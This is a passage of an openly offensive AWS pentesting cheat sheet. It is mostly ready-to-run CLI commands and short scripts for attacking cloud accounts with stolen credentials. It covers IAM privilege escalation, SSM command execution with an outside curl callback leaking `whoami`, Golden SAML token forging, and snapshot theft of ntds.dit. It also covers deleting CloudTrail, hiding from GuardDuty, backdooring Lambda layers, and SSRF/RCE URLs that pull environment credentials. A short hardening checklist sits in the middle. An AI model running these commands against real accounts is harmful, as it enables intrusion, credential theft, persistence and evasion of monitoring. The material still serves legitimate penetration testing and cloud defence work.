19:44:57,801 [aws_consoler.cli] INFO: Calling logic. +2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established. +2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session. 
+2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established. +2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler. +2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated! +https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED +``` + +## AWS - Enumerate IAM permissions + +Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam) + +```powershell +git clone git@github.com:andresriancho/enumerate-iam.git +pip install -r requirements.txt +./enumerate-iam.py --access-key AKIA... --secret-key StF0q... +2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..." +2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked! +2019-05-10 15:58:01,537 - 21345 - [INFO] -- { + "RoleDetailList": [ + { + "Tags": [], + "AssumeRolePolicyDocument": { + "Version": "2008-10-17", + "Statement": [ + { +... +2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked! +2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked! +2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked! +2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked! +2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked! +``` + +## AWS - Mount EBS volume to EC2 Linux + +:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. 
The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. + +1. Head over to EC2 –> Volumes and create a new volume of your preferred size and type. +2. Select the created volume, right click and select the "attach volume" option. +3. Select the instance from the instance text box as shown below : `attach ebs volume` +```powershell +aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone +aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device +``` +4. Now, login to your ec2 instance and list the available disks using the following command : `lsblk` +5. Check if the volume has any data using the following command : `sudo file -s /dev/xvdf` +6. Format the volume to ext4 filesystem using the following command : `sudo mkfs -t ext4 /dev/xvdf` +7. Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume` +8. Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/` +9. cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .` + + +## AWS - Copy EC2 using AMI Image + +First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1` + +```powershell +# create a new image for the instance-id +$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 + +# add key to AWS +$ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 + +# create ec2 using the previously created AMI, use the same security group and subnet to connect easily. 
+$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1 + +# now you can check the instance +aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 + +# If needed : edit groups +aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1 + +# be a good guy, clean our instance to avoid any useless cost +aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +``` + +## AWS - Instance Connect - Push an SSH key to EC2 instance + +```powershell +# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/ +$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}" +$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds +``` + +## AWS - Lambda - Extract function's code + +```powershell +# https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed +$ aws lambda list-functions --profile uploadcreds +$ aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds +$ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds +``` + +## AWS - SSM - Command execution + +:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled. 
+ +SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs): +* Windows Server 2008-2012 R2 AMIs published in November 2016 or later +* Windows Server 2016 and 2019 +* Amazon Linux +* Amazon Linux 2 +* Ubuntu Server 16.04 +* Ubuntu Server 18.04 +* Amazon ECS-Optimized + +```powershell +$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1 +$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds +$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds + +e.g: +$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1 +``` + +## AWS - Golden SAML Attack + +https://www.youtube.com/watch?v=5dj4vOqqGZw +https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/ + +> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user's password. This attack also bypasses any MFA requirements. 
+ +Requirement: +* Token-signing private key (export from personal store using Mimikatz) +* IdP public certificate +* IdP name +* Role name (role to assume) + +```powershell +$ python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml +$ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file +-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 +``` + +## AWS - Shadow Copy attack + +Prerequisite: +* EC2:CreateSnapshot +* CloudCopy - https://github.com/Static-Flow/CloudCopy + +1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions +2. Run `"Describe-Instances"` and show in list for attacker to select +3. Run `"Create-Snapshot"` on volume of selected instance +4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account +5. Load AWS CLI with Attacker Credentials +6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot +7. Ssh run `"sudo mkdir /windows"` +8. Ssh run `"sudo mount /dev/xvdf1 /windows/"` +9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"` +10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"` +11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"` +12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"` +13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"` +14. 
locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path + +## Disable CloudTrail + +```powershell +$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator +``` + +Disable monitoring of events from global services + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event +``` + +Disable Cloud Trail on specific regions + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west +``` + +## Cover tracks by obfuscating Cloudtrail logs and Guard Duty + +:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent. + +Pacu bypass this problem by defining a custom User-Agent (https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473) + +```python +boto3_session = boto3.session.Session() +ua = boto3_session._session.user_agent() +if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): # If the local OS is Kali/Parrot/Pentoo Linux + # GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that... + self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...') +``` + +## DynamoDB +> Amazon DynamoDB is a key-value and document database that delivers single-digit millisecond performance at any scale. It's a fully managed, multi-region, multi-active, durable database with built-in security, backup and restore, and in-memory caching for internet-scale applications. DynamoDB can handle more than 10 trillion requests per day and can support peaks of more than 20 million requests per second. 
+ +* list tables +```bash +$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables + +{ + "TableNames": [ + "users" + ] +} +``` + +* enumerate table content +```bash +$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]' + +{ + "password": { + "S": "Management@#1@#" + }, + "username": { + "S": "Mgmt" + } +} +``` + +## Security checks + +Security checks from [DenizParlak/Zeus: AWS Auditing & Hardening Tool](https://github.com/DenizParlak/Zeus) + +* Identity and Access Management + * Avoid the use of the "root" account + * Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password + * Ensure credentials unused for 90 days or greater are disabled + * Ensure access keys are rotated every 90 days or less + * Ensure IAM password policy requires at least one uppercase letter + * Ensure IAM password policy requires at least one lowercase letter + * Ensure IAM password policy requires at least one symbol + * Ensure IAM password policy requires at least one number + * Ensure IAM password policy requires minimum length of 14 or greater + * Ensure no root account access key exists + * Ensure MFA is enabled for the "root" account + * Ensure security questions are registered in the AWS account + * Ensure IAM policies are attached only to groups or role + * Enable detailed billing + * Maintain current contact details + * Ensure security contact information is registered + * Ensure IAM instance roles are used for AWS resource access from instances +* Logging + * Ensure CloudTrail is enabled in all regions + * Ensure CloudTrail log file validation is enabled + * Ensure the S3 bucket CloudTrail logs to is not publicly accessible + * Ensure CloudTrail trails are integrated with CloudWatch Logs + * Ensure AWS Config is enabled in all regions + * Ensure S3 bucket access logging is enabled on the CloudTrail S3 bucket + * Ensure CloudTrail logs are encrypted at rest using KMS CMKs + * Ensure rotation 
for customer created CMKs is enabled +* Networking + * Ensure no security groups allow ingress from 0.0.0.0/0 to port 22 + * Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389 + * Ensure VPC flow logging is enabled in all VPC + * Ensure the default security group of every VPC restricts all traffic +* Monitoring + * Ensure a log metric filter and alarm exist for unauthorized API calls + * Ensure a log metric filter and alarm exist for Management Consolesign-in without MFA + * Ensure a log metric filter and alarm exist for usage of "root" account + * Ensure a log metric filter and alarm exist for IAM policy changes + * Ensure a log metric filter and alarm exist for CloudTrail configuration changes + * Ensure a log metric filter and alarm exist for AWS Management Console authentication failures + * Ensure a log metric filter and alarm exist for disabling or scheduled deletion of customer created CMKs + * Ensure a log metric filter and alarm exist for S3 bucket policy changes + * Ensure a log metric filter and alarm exist for AWS Config configuration changes + * Ensure a log metric filter and alarm exist for security group changes + * Ensure a log metric filter and alarm exist for changes to NetworkAccess Control Lists (NACL) + * Ensure a log metric filter and alarm exist for changes to network gateways + * Ensure a log metric filter and alarm exist for route table changes + * Ensure a log metric filter and alarm exist for VPC changes + +## AWSome Pentesting Cheatsheet + +* Created by pop3ret + +## Searching for open buckets + +``` +https://buckets.grayhatwarfare.com/ +``` + +## ARN + +A number to identify an object in AWS + +Example + +``` +arn:aws:iam:100:user/admin +``` + +1. Field -> ARN +2. Field -> Type, most of time will be AWS +3. Field -> service, in this case IAM +4. Field -> User ID +5. 
Field -> entity identifier + +## IAM +* It's assumed that we have gain access to the AWS Credentials +* We can see if we have permissions using [Amazon's policy simulator](**[https://policysim.aws.amazon.com/](https://policysim.aws.amazon.com/)**) +* Always look for policies and roles with the * symbol. +* See which user do not have MFA enabled +* User enumeration in IAM Panel and group enumeration +* We can also enumerate roles from the same interface +* Root user is super admin + +## Configure AWS cli + +``` +aws configure +``` + +Or configure it using a profile + +``` +aws configure --profile example_name +``` + +The credential file is located in `~/.aws/credentials` + +## Listing IAM access Keys + +``` +aws iam list-access-keys +``` + +## 1. Enumerating IAM users + +### Checking credentials for the user + +``` +aws sts get-caller-identity +``` + +### Listing IAM Users + +``` +aws iam list-users +``` + +### Listing the IAM groups that the specified IAM user belongs to + +``` +aws iam list-groups-for-user --user-name user-name +``` + +### Listing all manages policies that are attached to the specified IAM user + +``` +aws iam list-attached-user-policies --user-name user-name +``` + +### Listing the names of the inline policies embedded in the specified IAM user + +``` +aws iam list-user-policies --user-name user-name +``` + +## 2. Enumerating Groups IAM + +### Listing IAM Groups + +``` +aws iam list-groups +``` + +### Listing all managed policies that are attached to the specified IAM Group + +``` +aws iam list-attached-group-policies --group-name group-name +``` + +### Listing the names of the inline policies embedded in the specified IAM Group + +``` +aws iam list-group-policies --group-name group name +``` + +## 3. 
Enumeratig Roles + +### Listing IAM Roles + +``` +aws iam list-roles +``` + +### Listsing all managed policies that are attached to the specified IAM role + +``` +aws iam list-attached-role-policies --role-name role-name +``` + +### Listing the names of the inline policies embedded in the specified IAM role + +``` +aws iam list-role-policies --role-name role-name +``` + +## 4. Enumerating Policies + +### Listing of IAM Policies + +``` +aws iam list-policies +``` + +### Retrieving information about the specified managed policy + +``` +aws iam get-policy --policy-arn policy-arn +``` + +### Listing information about the versions of the specified manages policy + +``` +aws iam list-policy-versions --policy-arn policy-arn +``` + +### Retrieving information about the specific version of the specified managed policy + +``` +aws iam get-policy-version --policy-arn policy-arn --version-id version-id +``` + +### Retrieving the specified inline policy document that is embedded on the specified IAM user / group / role + +``` +aws iam get-user-policy --user-name user-name --policy-name policy-name + +aws iam get-group-policy --group-name group-name --policy-name policy-name + +aws iam get-role-policy --role-name role-name --policy-name policy-name +``` + +## 5. Exploitation Scenario + +### General Guidelines +* AWS token compromised (Developer machine, phishing etc) and we as attackers will gonna use it. 
+ +### Enumerating the owner of the key and initial compromise + +``` +aws sts get-caller-identity +``` + +Or specifing a profile + +``` +aws sts get-caller-identity --profile example_name +``` + +If you have the password of the root account instead of key, log in + +``` +https://signin.aws.amazon.com/console +``` + +Or use the IAM in case the account is not the root + +``` +https://account-id-here.signin.aws.amazon.com/console +``` + +*The account id can be cathered using the sts get caller command.* + +### Privilege Escalation +* Privilege escalation on AWS is based on misconfigurations, if we have more permissions than necessary, its possible to obtain higher privileges. + +#### Study Case +* A user was compromised with the *List Policy* and *Put User Policy* permissions, an attacker could leverage this *Put User* privilege to add an inline administrator to itself, making it administrator of the instance. + +##### Exploitation +1. Getting the IAM user + +``` +aws sts get-caller-identity +``` + +2. Listing policies attached to an user + +``` +aws iam list-attached-user-policies --user-name example_name -- profile example_profile +``` + +3. Retrieving informations about an specific policy + +``` +aws iam get-policy --policy-arn policy_arn +``` + +If there are more than one version of the policy, we can also list them + +``` +aws iam list-policy-versions --policy-arn policy_arn +``` + +Now we can finally retrieve the contents of the policy + +``` +aws iam get-policy-version --policy-arn example_arn --version-id id_example +``` + +*It's important to use the command above to chech the information about the default policy* + +4. Escalation + +If we have the PutUserPolicy is enabled, we can add an inline administrator policy to our user. 
+ +Administrator policy example + +```json +{ + "Version": "2021-10-17", + "Statement" : [ + { + "Effect":"Allow", + "Action": [ + "*" + ], + "Resource":[ + "*" + ] + } + ] +} +``` + +### Attaching this policy into our user + +``` +aws iam put-user-policy --user-name example_username --policy-name example_name --policy-document file://AdminPolicy.json +``` + +### Listing inline policies of our user + +``` +aws iam list-user-policies --user-name example_name +``` + +### Listing a restricted resource (Example S3) + +``` +aws s3 ls --profile example_profile +``` + +### Interesting Permissions + +* iam:AttachUserPolicy -> Attach a policy to a user +* iam:AttachGroupPolicy -> Attach a policy to a group +* iam:AttachRolePolicy -> Attach a policy to a role +* iam:CreateAccessKey -> Creates a new access key +* iam:CreateLoginProfile -> Creates a new login profile +* iam:UpdateLoginProfile -> Update an existing login profile +* iam:PassRole and ec2:RunInstances -> Creates an EC2 instance with an existing instance profile +* iam:PuserUserPolicy -> Create/Update an inline policy +* iam:PutGroupPolicy -> Create/Update an inline policy for a group +* iam:PutRolePolicy -> Create/Update an inline policy for a role +* iam:AddUserToGroup -> Add an user to a group +* iam:UpdateAssumeRolePolicy and sts:AssumeRole -> Update the AssumeRolePolicyDocument of a role +* iam:PassRole,lambda:CreateFunction and lambda:InvokeFunction -> Pass a role to a new lambda function and invoke it +* lambda:UpdateFunctionCode -> Update the code of an existing lambda function + +### Persistence & Backdooring +* Suppose we have two users, the user A has permissions to create Access Keys to user B, this misconfig allows us to create an access key for user B and persist our access. 
+ +#### Creating a new access key for another user + +``` +aws iam create-access-key --username example_username +``` + +#### Configuring AWS cli for the new user + +``` +aws configure --profile example_profile +``` + +*Remember, an user can have the maximum of 2 access keys*. + +#### Testing the credential + +``` +aws sts get-caller-identity --profile example_profile +``` + +#### Accessing more credentials +* It's possible to assume other roles with the sts:AssumeRole permission (Example: An user doesn't have access to an s3 instance, but it has this permission, we can easily assume other roles if we are in the trust relashionship, increasing our access in the instance) + +##### Listing managed policies attached to an user + +``` +aws iam list-attached-user-policies --user-name example_name +``` + +##### Retrieving information about an specific policy + +``` +aws iam get-policy --policy-arn ARN +``` + +##### Listing information about the version of the policy + +``` +aws iam list-policy-versions --policy-arn ARN +``` + +##### Retrieving information about an specific version + +``` +aws iam get-policy-version --policy-arn policy_arn --version-id ID +``` + +##### Listing IAM roles + +``` +aws iam list-roles +``` + +##### Listing trust relashionship between role and user (Which roles we can assume) + +``` +aws iam get-role --role-name role_name +``` + +##### Listing all managed policies attached to the specific IAM role + +``` +aws iam liast-attached-role-policies --role-name role_name +``` + +##### Retrieving information about the specified version of the policy + +``` +aws iam get-policy-version --policy-arn policy_arn --version-id ID +``` + +##### Getting temporary credentials for the role + +``` +aws sts assume-role --role-arn role_arn --role-session-name session_name +``` + +##### Configuring AWS cli with newer credentials (On Linux) + +``` +export AWS_ACCESS_KEY_ID +export AWS_SECRET_KEY +export AWS_SESSION_TOKEN +``` + +##### Getting information about the 
temporary credential + +``` +aws sts get-caller-identity +``` + +## S3 - Simple Storage System + +* Storage system that allow users to store and retrieve data. +* List,Get,Put and Delete operations can be performed on the objects of the bucket +* Buckets are global, meaning that they are available to all regions +* It's possible to bruteforce the bucket name and region in the URL +* Its possible to apply ACL's to bucket and object level and bucket policies for bucket level +* There is also time limited URL's and identity based policies +* Identity policies are enumerated using IAM commands + +## Enumeration + +### Listing all buckets in aws account + +``` +aws s3api list-buckets +``` + +### Getting information about a specific bucket + +``` +aws s3api get-bucket-acl --bucket name +``` + +### Getting information about a specific bucket policy + +``` +aws s3api get-bucket-policy --bucket name +``` + +### Getting the Public Access Block configuration for an S3 bucket + +``` +aws s3api get-public-access-block --bucket name +``` + +### Listing all objects in a specific bucket + +``` +aws s3api list-objects --bucket name +``` + +### Getting ACL information about specific object + +``` +aws s3api get-object-acl --bucket-name name --key object_name +``` + +## Data Exfiltration +* It's possible to brute-force files in the bucket +* If the bucket is misconfigured, we can read data through web browser, cli/api or time-based URL. 
+ +### Public Access + +* Just enter the URL in the browser + +``` +https://bucket-name.region.amazonaws.com/secret.txt +``` + +### Authenticated User + +``` +aws s3api get-object --bucket name --key object-name download-file-location +``` + +### Time-Based Url + +* Generate a time based url for an object +* Userful if the object is not public + +``` +aws s3 presign s3://bucket-name/object-name --expires-in 605000 +``` + +## Lambda & API Gateway +* Serverless event driven platform +* Runs code in response to events and automatically manages computing resources required by that code +* Can trigger from other AWS services or call directly from the API Gateway +* A lambda function is a piece of code that is executed whenever is triggered by an event from an event source +* API Gateway is an AWS service for creating, publishing, maintaining, monitoring and securing REST, HTTP and WebSocket API +* API Gateway can be used to trigger lambda functions in a synchronous (api gateway), asynchronous (event) or stream (Poll Based) way. +* If we found a lambda function that access an S3 (Example) its possible to change its code and gain access to the files. +* If API Gateway is used, we can enumerate the API to see how its possible to invoke the lambda function (Craft the URL). 
+ +## Enumeration + +### Listing All lambda functions + +``` +aws lambda list-functions +``` + +### Listing information about a specific lambda function + +``` +aws lambda get-function --function-name function_name +``` + +* *This command enables us to download the source code of the lambda function* + +### Listing policy information about the function + +``` +aws lambda get-policy --function-name function_name +``` + +* We can get informations like who can execute this functions, ID and other informations with this command + +### Listing the event source mapping information about a lambda function + +``` +aws lambda list-event-source-mappings --function-name function_name +``` + +### Listing Lambda Layers (Depedencies) + +``` +aws lambda list-layers +``` + +### Listing full information about a lambda layer + +``` +aws lambda get-layer-version --layer-name name --version-number version_number +``` + +### Listing Rest API'S + +``` +aws apigateway get-rest-apis +``` + +### Listing information about a specific API + +``` +aws apigateway get-rest-api --rest-api-id ID +``` + +### Listing information about endpoints + +``` +aws apigateway get-resources --rest-api-id ID +``` + +### Listing information about a specific endpoint + +``` +aws apigateway get-resource --rest-api-id ID --resource-id ID +``` + +### Listing method information for the endpoint + +``` +aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method +``` + +* Test various methods to see if the API supports it. 
+ +### Listing all versions of a rest api + +``` +aws apigateway get-stages --rest-api-id ID +``` + +### Getting informatin about a specific version + +``` +aws apigateway get-stage --res-api-id ID --stage-name NAME +``` + +### Listing API KEYS + +``` +aws apigateway get-api-keys --include-values +``` + +### Getting information about a specific API Key + +``` +aws apigateway get-api-key --api-key KEY +``` + +## Initial Access + +* Its possible to get RCE through API Gateway if it executes commands. +* If you can execute commands, there is a way to retrieve keys from the API Gateway, just use `env` , configure `aws cli` and proceed with the exploitation. + +## Credential Access + +Getting credentials from Lambda can be done in 2 ways + +1. Keys in the source code +2. Keys in the enviroment variables + +These keys can be gathered using SSRF, RCE and so on. + +### Getting credentials using RCE + +``` +https://apigateway/prod/system?cmd=env +``` + +### Getting credentials using SSRF + +``` +https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/invocation/next +``` + +### Getting credentials using SSRF and wrappers + +``` +https://apigateway/prod/system?cmd=file:///proc/self/environ +``` + +### Getting credentials from lambda enviroment variables (cli) + +``` +aws lambda get-function --function-name NAME +``` + +* It's important to enumerate the functions first with `aws lambda list-functions` + +## Persistence +* If the user has sufficient rights in the lambda function, its possible to download the source code, add a backdoor to it and upload. Everytime the lambda executes, the malicious code will also execute. +* Always try to update the code of layers (depedencies) instead of the actual lambda code, this way our backdoor will be difficult to detect. 
+ +### Checking which user is executing + +``` +aws sts get-caller-identity +``` + +### Checking all managed policies attached to the user + +``` +aws iam list-attached-user-policies --user-name user_name +``` + +### Checking informations about a specific policy + +``` +aws iam get-policy-version --policy-arn arn --version-id ID +``` + +### Listing all lambda functions + +``` +aws lambda list-functions --region region +``` + +### Listing information about the specified lambda + +``` +aws lambda get-function --function-name name +``` + +* Download and analyze the codes + +### Listing policy information about the specific lambda function + +``` +aws lambda get-policy --function-name name --profile profile --region region +``` + +* We can grab informations like id, who can invoke and other details with this command (Helps to build the query to execute the lambda function). + +### Listing Rest API'S + +``` +aws apigateway get-rest-apis +``` + +### Listing information about a specific API + +``` +aws apigateway get-rest-api --rest-api-id ID +``` + +### Listing information about endpoints + +``` +aws apigateway get-resources --rest-api-id ID +``` + +### Listing information about a specific endpoint + +``` +aws apigateway get-resource --rest-api-id ID --resource-id ID +``` + +### Listing method information for the endpoint + +``` +aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method +``` + +* Test various methods to see if the API supports it. 
+ +### Listing all versions of a rest api + +``` +aws apigateway get-stages --rest-api-id ID +``` + +### Getting informatin about a specific version + +``` +aws apigateway get-stage --res-api-id ID --stage-name NAME +``` + +### Uploading the backdoor code to aws lambda function + +``` +aws lambda update-function-code --function-name function --zip-file fileb://my-function.zip +``` + +### Invoke the Function + +``` +curl https://uj3948ie.execute-api.us-east-2.amazonaws.com/default/EXAMPLE +``` + +Where + +1. API-ID -> uj3948ie +2. Region -> us-east-2 +3. Resource (Endpoint) -> EXAMPLE +4. Method -> Get +5. Stage (Version) -> default +6. API-Key -> None + +*All these details are gathered during the enumeration.* + +## Privilege Escalation +* If we have a user with PassRole and CreateFunction roles and also AttachRolePolicy role in a Lambda Function, its possible to create a function with a code that changes the lambda role to admin then the user to Administrator. + +### Create a lambda function and attach a role to it + +``` +aws lambda create-function --function-name my-function --runtime python3.7 --zip-file fileb://my-function.zip --handler my-function.handler --role ARN --region region +``` + +* Inside the function's code, we will add the administrator permission to the role and to the user + +#### Example code to add the permissions + +```python +import boto3 +import json + +def handler(event,context) + iam = boto3.client("iam") + iam.attach.role.policy(RoleName="name",PolicyArn="arn",) + iam.attach.user.policy(UserName="name",PolicyArn="arn",) + return { + 'statusCode':200 + 'body':json.dumps("Pwned") + } +``` + +### Invoke a lambda function + +``` +aws lambda invoke --function-name name response.json --region region +``` + +### Listing managed policies to see if the change worked + +``` +aws iam list-attached-user-policies --user-name user_name +``` + +## AWS Secret Manager + +* AWS Service that encrypts and store secrets +* Transparently decrypts and return 
in plaintext +* KMS used to store keys (AWS Key and Customer Managed Key) +* Asymmetric and Symmetric keys can be created using KMS + + +## Enumeration + +### Listing all secrets stored by Secret Manager + +``` +aws secretsmanager list-secrets +``` + +### Listing information about a specific secret + +``` +aws secretsmanager describe-secret --secret-id name +``` + +### Getting policies attached to the specified secret + +``` +aws secretsmanager get-resource-policy --secret-id ID +``` + +### Listing keys in KMS + +``` +aws kms list-keys +``` + +### Listing information about a specific key + +``` +aws kms describe-key --key-id ID +``` + +### Listing policies attached to a specific key + +``` +aws kms list-key-policies --key-id ID +``` + +### Getting full information about a policy + +* Shows who can access the keys + +``` +aws kms get-key-policy --policy-name name --key-id ID +``` + +## Credential Exfiltration + +* If the user has access to Secret Manager, it can decrypt the secrets using the web, cli or API + +### Listing policies attached to an user + +``` +aws iam list-attached-user-policies --user-name name +``` + +### Retrieving information about a specific version of policy + +* Here we can see the permissions + +``` +aws iam get-policy-version --policy-arn arn --version-id id +``` + +### Listing all secrets stored by Secret Manager + +``` +aws secretsmanager list-secrets +``` + +### Listing information about a specific secret + +* Here we get the secret Key Id to descript the secret + +``` +aws secretsmanager describe-secret --secret-id name +``` + +### Getting resource-based policy attached to an specific secret + +``` +aws secretsmanager get-resource-policy --secret-id ID +``` + +### Getting the secret value + +* Retrieves the actual value + +``` +aws secretsmanager get-secret-value --secret-id ID +``` + +### KMS + +* If we compromised as an example an S3 with an encrypted file, we can decrypt it using the keys stored in KMS. 
+ +#### Listing an specific key + +``` +aws kms describe-key --key-id id +``` + +#### Listing policies attached to an specified key + +* Here we can see who can access the key, the description of it and so on + +``` +aws kms list-key-policies --key-id ID +``` + +#### Listing full information about a policy + +* Run the previous command in all keys to see who can access it + +``` +aws kms get-key-policy --policy-name name --key-id ID +``` + +#### Decrypt the secret using the key + +* There is no need to specificy the key information because this information is embbeded in the encrypted file + +``` +aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext +``` + +## Containers + +Divided into three categories + +* Registry -> Secure place to store container images (ECR) +* Orchestration -> Configure when and where the containters run (ECS,EKS) +* Compute -> Use to do computing related tasks (EC2, Fargate) +* Its possible to create a backdoor image and add to a EKS cluster +* Always look how VPC's are communicatig with each other, maybe is possible to pivot through the EKS VPC from other VPC and compromise the entire cluster + +## Initial Access + +* The initial access can be done by exploiting some RCE in webapp to get access to the container, afterwards its possible to compromise the EC2. 
+ +After the RCE, we can list all secrets in EKS + +``` +https://website.com?rce.php?cmd=ls /var/run/secrets/kubernets.io/serviceaccount +``` + +### Getting the secret information from EKS + +``` +https://website.com?rce.php?cmd=ls /var/run/secrets/kubernets.io/serviceaccount/token +``` + +* It's also possible to do sandbox escaping (Tool: ``deepce``) + +## Enumeration + +### ECR + +#### Listing all repositories in container registry + +``` +aws ecr describe-repositories +``` + +#### Listing information about repository policy + +``` +aws ecr get-repository-policy --repository-name name +``` + +#### Listing all images in a specific repository + +``` +aws ecr list-images --repository-name name +``` + +#### Listing information about an image + +``` +aws ecr describe-images --repository-name name --images-ids imageTag=name +``` + +### ECS + +#### Listing all ECS clusters + +``` +aws ecs list-clusters +``` + +#### Listing information about an specific cluster + +``` +aws ecs describe-clusters --cluster name +``` + +#### Listing all services in specified cluster + +``` +aws ecs list-services --cluster name +``` + +#### Listing information about an specific service + +``` +aws ecs descibe-services --cluster name --services name +``` + +* This command shows the logs of the service + +#### Listing tasks in specific cluster + +``` +aws ecs list-tasks --cluster name +``` + +#### Listing information about an specific task + +``` +aws ecs describe-tasks --cluster name -tasks taskArn +``` + +* Also shows information about network, userful if trying to pivot + +#### Listing all containers in specified cluster + +``` +aws ecs list-container-instances --cluster name +``` + +### EKS + +#### Listing all EKS clusters + +``` +aws eks list-clusters +``` + +#### Listing information about an specific cluster + +``` +aws eks describe-cluster --name name +``` + +#### Listing all node groups in specified cluster + +``` +aws eks list-nodegroups --cluster-name name +``` + +#### Listing 
